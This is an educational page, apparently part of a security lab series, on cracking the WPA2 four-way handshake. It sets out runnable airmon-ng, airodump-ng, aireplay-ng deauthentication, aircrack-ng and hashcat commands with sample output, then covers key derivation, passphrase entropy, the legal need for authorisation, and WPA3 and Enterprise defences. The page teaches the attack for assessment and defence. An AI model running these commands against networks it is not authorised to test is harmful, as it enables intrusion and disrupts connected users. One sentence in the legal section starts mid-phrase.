Understand the WPA2 four-way handshake cryptographic architecture, how offline dictionary attacks recover the pre-shared key, why password entropy is the decisive variable, the legal framework governing wireless security assessments, and the defensive controls — including WPA3 — that close the offline cracking window entirely.
WPA2 and the Handshake
WPA2 (Wi-Fi Protected Access 2) is the standard encryption protocol for wireless networks. When a client connects to a WPA2 network, it performs a four-way handshake with the access point to establish an encryption key. This handshake can be captured by anyone within radio range — and once captured, can be cracked offline using a dictionary attack.
The critical weakness: the passphrase is not transmitted during the handshake, but the handshake contains enough information to verify whether a guessed passphrase is correct. This enables offline brute forcing without any further interaction with the target network.
Why Wireless Security Assessment Matters
Wireless network security is a standard component of penetration testing engagements for organisations with physical premises. A compromised wireless network provides network-layer access equivalent to a physical Ethernet connection — bypassing perimeter firewalls, reaching internal servers, and potentially the internal Active Directory domain. An attacker who cracks a WPA2 passphrase from a parking lot has the same access as an employee plugging in at their desk.
The stakes are particularly high in environments where the wireless network bridges into sensitive infrastructure: corporate networks, industrial control systems, medical devices, or point-of-sale systems. A weak passphrase on any of these is a network-layer entry point that no amount of server-side security can compensate for.
Capture and Crack
The attack has two phases: capture the four-way handshake (by monitoring for a client connecting, or by forcing a reconnect with a deauth packet), then run a dictionary attack against the captured handshake offline.
- Phase 1: Put wireless card in monitor mode
- Phase 2: Capture traffic on target channel
- Phase 3: Capture the 4-way handshake (wait or deauth)
- Phase 4: Run dictionary attack against .cap file offline
- Phase 5: Recovered passphrase → join the network
WPA2 Cracking in Practice
Monitor mode allows the wireless card to capture all packets, not just those addressed to it.
```
iwconfig                    # find wireless interface (e.g. wlan0)
airmon-ng start wlan0       # enable monitor mode → creates wlan0mon
airodump-ng wlan0mon        # scan for nearby networks

BSSID              CH  ENC   ESSID
AA:BB:CC:DD:EE:FF  6   WPA2  TargetNetwork
```
Lock onto the target network and wait for a client to connect — or force a reconnect with a deauthentication attack.
```
# Capture on target channel and BSSID:
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Speed it up — send deauth to force client reconnect:
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

WPA handshake: AA:BB:CC:DD:EE:FF   ← captured!
```
Run the captured handshake against a wordlist. aircrack-ng computes the PMK for each candidate and checks it against the handshake.
```
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

Opening capture-01.cap
Read 1234 packets.

#  BSSID              ESSID      Encryption
1  AA:BB:CC:DD:EE:FF  TargetNet  WPA (1 handshake)

Aircrack-ng 1.7
KEY FOUND! [ wifi2023 ]
```
Convert the capture to hashcat format for GPU-accelerated cracking — orders of magnitude faster than CPU.
```
hcxpcapngtool capture-01.cap -o capture.hc22000
hashcat -m 22000 capture.hc22000 rockyou.txt

Speed: 1,234,567 H/s   ← 1.2 million attempts/sec on GPU
AA:BB:CC:DD:EE:FF:wifi2023
```
What You Need to Know
The Four-Way Handshake — Under the Hood
Understanding why the four-way handshake is vulnerable to offline cracking requires understanding what it actually does cryptographically. The handshake is not transmitting the passphrase — it is establishing a shared session key through a challenge-response protocol. The weakness is that the verification material embedded in the handshake is derived from the passphrase in a way that makes it checkable offline without the passphrase ever being disclosed.
Key Derivation Chain: Passphrase → PMK → PTK
The WPA2 key hierarchy has two levels. The first is the Pairwise Master Key (PMK), which is derived from the passphrase using PBKDF2 (Password-Based Key Derivation Function 2) with HMAC-SHA1, iterated 4,096 times, with the SSID (network name) as the salt. The output is a 256-bit key that represents a "long-term" secret for this particular client-network pair.
The second level is the Pairwise Transient Key (PTK), which is derived from the PMK along with two random nonces (one from the AP, one from the client) and both MAC addresses. The PTK changes with every session and is used to encrypt actual data traffic. The four-way handshake exchanges the nonces needed to derive the PTK on both sides, and includes a Message Integrity Check (MIC) that proves both parties derived the same PTK — which in turn proves both parties know the same PMK — which proves both know the correct passphrase.
Imagine two safecrackers who want to verify they both know the same combination without actually saying it aloud where others might hear. They each generate a random number, exchange them publicly, then independently compute a result using their secret combination and both random numbers. They then compare a small piece of the result — if it matches, they both know the same combination without either having disclosed it. An attacker who overheard the exchange of random numbers and the comparison result can later sit privately and test every combination from a list: generate the same computation for each candidate, compare the result to what they recorded. That is exactly what offline WPA2 cracking does — the captured handshake contains the random nonces and the MIC; any attacker with the capture file can test candidate passphrases at whatever speed their hardware allows.
```
# Step 1: PMK derived from passphrase + SSID
PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits)
# The SSID is the salt — "TargetNetwork" produces a different PMK
# than "HomeWifi" even with the same passphrase.
# This prevents pre-computed rainbow tables across all networks.

# Step 2: PTK derived from PMK + nonces + MAC addresses
PTK = PRF-512(PMK, "Pairwise key expansion", AP_MAC || Client_MAC || ANonce || SNonce)

# Step 3: MIC computed to verify both parties share the PMK
# (HMAC-SHA1 truncated to 128 bits with AES-CCMP; HMAC-MD5 applies to TKIP)
MIC = HMAC-SHA1(PTK[0:16], EAPOL_frame)[0:16]
# The MIC is included in the handshake frames.

# Attacker captures: ANonce, SNonce, both MACs, and the MIC.
# For each candidate passphrase, attacker recomputes:
# 1. PMK from candidate + captured SSID
# 2. PTK from PMK + captured nonces + captured MACs
# 3. MIC from PTK + captured frame
# 4. Compare computed MIC to captured MIC — match = found!
```
Why PBKDF2 with 4096 Iterations Isn't Enough
When WPA2 was designed, 4,096 PBKDF2 iterations were chosen to make brute-forcing computationally expensive. In 2003, when the standard was finalised, consumer hardware could compute roughly tens of thousands of PMKs per second. The iteration count made a meaningful dent in attack speed.
Modern GPU hardware has fundamentally changed this calculation. A consumer-grade GPU in 2025 can compute approximately 400,000 to 1,000,000 WPA2 PMK derivations per second per GPU. A mid-range cracking rig with four GPUs tests 4–8 million passphrases per second. The 4,096-iteration cost that was once a meaningful barrier is now effectively irrelevant for dictionary attacks, which don't need to exhaust the keyspace — they only need to find a weak passphrase near the top of a well-curated wordlist.
Entropy, Cracking Speed, and Why Passphrase Length Matters
The fundamental question a security professional must be able to answer is: "How strong does a WPA2 passphrase actually need to be?" The answer requires understanding password entropy — the measure of unpredictability in a passphrase — and mapping it to realistic cracking speeds.
Entropy Calculation
Password entropy is measured in bits and calculated as: log₂(character_set_size) × password_length. A passphrase drawn from a larger character set or consisting of more characters has higher entropy and takes exponentially longer to crack by brute force. Dictionary attacks collapse this — a word from rockyou.txt has near-zero entropy regardless of character count because the attacker doesn't need to try the full keyspace.
| Passphrase | Type | Entropy | Time at 500K/s |
|---|---|---|---|
| password | Common word | ~0 bits (in wordlist) | < 1 second |
| wifi2023 | Word + year | ~0 bits (pattern wordlist) | < 1 second |
| P@ssw0rd! | Substitution pattern | ~0 bits (rule-based) | < 1 minute |
| correct horse | Two words | ~22 bits (2-word combo) | Hours to days |
| correct horse battery | Three words | ~33 bits (3-word combo) | Years |
| J7#mK$vQ2!xLp9@n | 16 random chars | ~105 bits | Heat death of universe |
| correct horse battery staple | Four words (XKCD) | ~44 bits (4-word combo) | Practically infeasible |
The table illustrates a counterintuitive truth: "P@ssw0rd!" — which looks complex — is actually weaker in practice than "correct horse battery" — which looks simple. The substitution patterns (@ for a, 0 for o, ! at the end) are so well-known that every serious cracking wordlist includes rule sets that generate them automatically. Predictable complexity is not entropy.
Imagine hiding a key somewhere in your house. You choose a "clever" hiding place — under the doormat, in the freezer behind the ice cream, on top of the door frame. These feel clever because they're not immediately obvious. But a professional burglar checks every one of those spots in the first two minutes because they're on the standard checklist. The hiding place that actually works is one that isn't on anyone's checklist — genuinely random and undocumented. Password cracking works identically: "P@ssw0rd1" is on the checklist. "kX7#mQ2vLp" is not. The former is found in seconds; the latter could take longer than the sun has left to burn.
The Dictionary Attack Model vs Pure Brute Force
Understanding the difference between dictionary attacks and brute force is important for accurate security advice:
- Pure brute force tries every possible character combination in sequence. Against a 16-character passphrase using the full printable ASCII character set (95 characters), this is 95¹⁶ ≈ 4.4 × 10³¹ combinations — computationally infeasible against any modern hardware for the foreseeable future.
- Dictionary attacks test candidates from a pre-built wordlist. The rockyou.txt list contains approximately 14 million entries — all tested in seconds on a GPU. Extended wordlists with billions of entries from multiple breach databases take minutes to hours.
- Rule-based attacks apply transformation rules to dictionary words (capitalise first letter, append numbers 0–99, replace a with @, etc.), expanding a 14-million-word dictionary into billions of candidates that cover the vast majority of human-chosen passwords.
The practical conclusion for security assessors: for a WPA2 network with a human-chosen passphrase, the realistic threat model is dictionary and rule-based attacks, not pure brute force. The question "is this passphrase secure?" is really "is this passphrase in any wordlist, or derivable from one via rule transformation?" A 20+ character truly random passphrase is immune to both. A 20-character passphrase built from recognisable words with predictable substitutions may not be.
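A passphrase audit that applies this reasoning when choosing or reviewing a PSK. It is an added example, not code from the original page: the wordlist is a small constructed stand-in, the substitution map is an assumed rule set, and the 11 bits per word figure is read off the word-combination rows of the table above.

```python
import math
import string

RATE = 500_000        # guesses per second, the rate used in the table above
BITS_PER_WORD = 11    # assumption: words picked at random from a 2048-word list

# Constructed stand-in for a real wordlist such as rockyou.txt.
WORDLIST = {"password", "wifi", "letmein", "welcome", "dragon", "internet"}

# Reverses the substitutions named above, plus a few common ones (assumed set).
DELEET = str.maketrans({"@": "a", "0": "o", "3": "e", "1": "i", "$": "s"})

# Printable ASCII classes: 26 + 26 + 10 + 33 (punctuation and space) = 95.
CLASSES = [string.ascii_lowercase, string.ascii_uppercase, string.digits,
           string.punctuation + " "]

def charset_size(passphrase: str) -> int:
    """Combined size of the character classes the passphrase draws from."""
    return sum(len(cls) for cls in CLASSES if any(c in cls for c in passphrase))

def formula_entropy_bits(passphrase: str) -> float:
    """log2(character_set_size) x length; valid only for randomly generated strings."""
    return math.log2(charset_size(passphrase)) * len(passphrase)

def brute_force_seconds(passphrase: str, rate: int = RATE) -> float:
    """Worst-case time to exhaust the full keyspace at `rate` guesses per second."""
    return charset_size(passphrase) ** len(passphrase) / rate

def rule_candidates(passphrase: str) -> set:
    """Base words from which simple rules (case, suffix, substitution) reach it."""
    low = passphrase.lower()
    stripped = low.rstrip(string.digits + string.punctuation)
    return {low, stripped, low.translate(DELEET), stripped.translate(DELEET)}

def audit(passphrase: str, wordlist=WORDLIST):
    """Return (verdict, estimated entropy in bits)."""
    if not 8 <= len(passphrase) <= 63:          # WPA2 passphrase length limits
        return ("invalid", 0.0)
    if rule_candidates(passphrase) & set(wordlist):
        return ("weak", 0.0)                    # "~0 bits": on the checklist
    words = passphrase.split(" ")
    if len(words) > 1 and all(w.isalpha() and w.islower() for w in words):
        return ("word-passphrase", float(BITS_PER_WORD * len(words)))
    # Upper bound: only holds if the characters were generated at random.
    return ("random-if-generated", formula_entropy_bits(passphrase))

if __name__ == "__main__":
    for p in ["wifi2023", "P@ssw0rd!", "correct horse battery staple",
              "J7#mK$vQ2!xLp9@n"]:
        verdict, bits = audit(p)
        print(f"{p!r:34} {verdict:20} {bits:6.1f} bits")
```

In a real review, replace `WORDLIST` with the organisation's own banned-password list and treat a "weak" verdict as a finding regardless of how complex the passphrase looks.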
Wireless Security Assessment — Legal and Professional Context
No tool in this lab series is more legally sensitive in practice than wireless capture tools. The reason is architectural: unlike web application testing or network scanning — which target systems you're connected to and can scope by IP address — passive wireless capture operates on shared radio spectrum. Your wireless card in monitor mode captures packets from every network within range, not just the one you're authorised to assess. This creates genuine legal complexity that practitioners must understand before conducting any wireless assessment.
The Authorisation Requirement
Wireless security assessments require the same written authorisation as any other penetration test — and the scope document should specifically address wireless testing. A general "you have permission to test our network" authorisation does not automatically cover wireless assessment because the physical radio environment may include networks operated by third parties (neighbours, other tenants in a shared building, nearby businesses) that you have no authorisation to test and may inadvertently capture.
Professional wireless assessment engagements typically include:
- Specific SSID/BSSID scope: The authorisation lists exactly which networks by BSSID (MAC address) are in scope. Any network not on the list is off-limits, regardless of physical proximity or apparent association with the client.
- Physical access control: Testing is conducted from within the client's property boundary, not from a public car park, to minimise capture of third-party networks.
- Rules for out-of-scope discovery: If testing reveals a network that appears to belong to the client but isn't in scope, it is documented and reported — not tested.
- Deauthentication disclosure: Sending deauth frames is an active attack that disrupts all clients connected to the target network, not just those directly involved in the handshake capture. This service disruption must be explicitly authorised and coordinated with the client — typically restricted to maintenance windows.
--bssid flag in airodump-ng), and careful review of captured .cap files before analysis to ensure only authorised traffic is processed.
What a Professional Wireless Assessment Actually Covers
Wireless security assessments in professional engagements are far broader than passphrase cracking. Passphrase strength is one finding category among many. A complete wireless assessment typically covers:
- Authentication protocol assessment: WPA2-Personal (PSK) vs WPA2-Enterprise (802.1X/RADIUS). Enterprise mode eliminates the shared-passphrase attack surface entirely — each user authenticates with individual credentials.
- Rogue access point detection: Unauthorised APs connected to the wired network, or "evil twin" APs that mimic legitimate SSIDs to intercept traffic.
- Client security assessment: Whether clients accept certificates from unknown CAs, whether they probe for SSIDs that could be exploited by rogue APs, and whether they maintain connections to unencrypted networks.
- Network segmentation validation: Whether the wireless network is properly isolated from sensitive internal segments, or whether wireless access provides unfiltered access to the same network as wired devices.
- WPA3 transition readiness: Whether the infrastructure supports WPA3 and what migration path is available.
WPA3, SAE, and the Complete Defensive Picture
Understanding what WPA3 changes — and what it doesn't — is essential for giving accurate security advice and for understanding what improvements organisations should be prioritising in their wireless infrastructure.
WPA3-Personal — Simultaneous Authentication of Equals (SAE)
WPA3's most significant improvement over WPA2 for personal/home networks is the replacement of the four-way handshake with SAE (Simultaneous Authentication of Equals), also known as Dragonfly. SAE is a cryptographic protocol from the family of Password Authenticated Key Exchange (PAKE) protocols that fundamentally changes the security model in two ways:
Forward secrecy: Each SAE authentication session generates a fresh, unique PMK even if the same passphrase is used. Capturing the SAE handshake from one session provides no useful material for cracking — there is nothing in the exchange that encodes the passphrase in a checkable form. Even if an attacker later learns the passphrase, they cannot retrospectively decrypt captured traffic from a previous session.
Offline attack resistance: SAE's design means the verifier (access point) actively participates in each authentication attempt. An attacker cannot take captured data home and test passphrases offline at GPU speed — they would need to interact with the AP for each guess, and APs implement rate limiting and lockout after failed attempts. This reduces the attack to at most a few thousand guesses rather than billions.
WPA2-Personal:
- Offline cracking: Captured handshake allows unlimited offline guessing at GPU speeds (millions/sec).
- No forward secrecy: An attacker who captures traffic now and learns the passphrase later can decrypt all historical traffic.
- Shared secret: All users share the same passphrase — one compromise affects the entire network and all devices.
- Deauth vulnerability: Clients can be forcibly disconnected to trigger handshake capture.

WPA3-Personal (SAE):
- No offline cracking: SAE exchange contains no material enabling offline passphrase verification. Each guess requires AP interaction.
- Perfect forward secrecy: Each session uses a unique PMK. Historical traffic cannot be decrypted even if the passphrase is later compromised.
- Rate limiting: The AP controls guess rate — effectively eliminating dictionary attacks in practice.
- Transition mode: WPA3-SAE/WPA2 mixed mode allows gradual migration without replacing all client devices simultaneously.
WPA2-Enterprise — The Right Answer for Organisations
For enterprise environments, WPA2-Enterprise (802.1X authentication with a RADIUS server) addresses the shared-passphrase weakness of WPA2-Personal entirely — not by improving the handshake, but by eliminating the shared passphrase in the first place. Each user or device authenticates with their own credentials (username/password, certificate, or smart card), validated by a central RADIUS server.
This means there is no single shared secret that an attacker could capture and crack. Compromising one user's credentials compromises only that user's wireless access, not the entire network. Certificate-based 802.1X also provides strong mutual authentication — clients verify the RADIUS server's certificate before transmitting credentials, preventing certain rogue AP attacks that capture credentials by impersonating the legitimate network.
Practical Hardening Recommendations
- Minimum passphrase length 20+ characters: For WPA2-Personal networks, this is the single most impactful control. At 20 random characters, dictionary and rule-based attacks become computationally infeasible even with large wordlists. Use a password manager to generate and store it — humans should not be trying to memorise 20-character random strings.
- Migrate to WPA3 where hardware supports it: Most access points manufactured after 2020 support WPA3. Enable WPA3-SAE/WPA2 transition mode to maintain compatibility with older client devices during migration.
- Deploy WPA2/3-Enterprise for corporate environments: 802.1X with RADIUS eliminates the shared passphrase attack surface and provides per-user credential management and audit trail.
- Network segmentation: Ensure the wireless network is isolated from sensitive internal infrastructure by a properly configured firewall. Wireless access should reach the internet and specifically authorised internal resources, not the entire internal network as a flat layer-2 broadcast domain.
- Rogue AP monitoring: Deploy wireless intrusion detection (WIDS) to alert on unauthorised access points appearing within the radio environment. Most enterprise wireless controllers include this capability.
- Regular passphrase rotation for PSK networks: Change WPA2-Personal passphrases on a schedule and immediately after the departure of anyone who had access to the passphrase.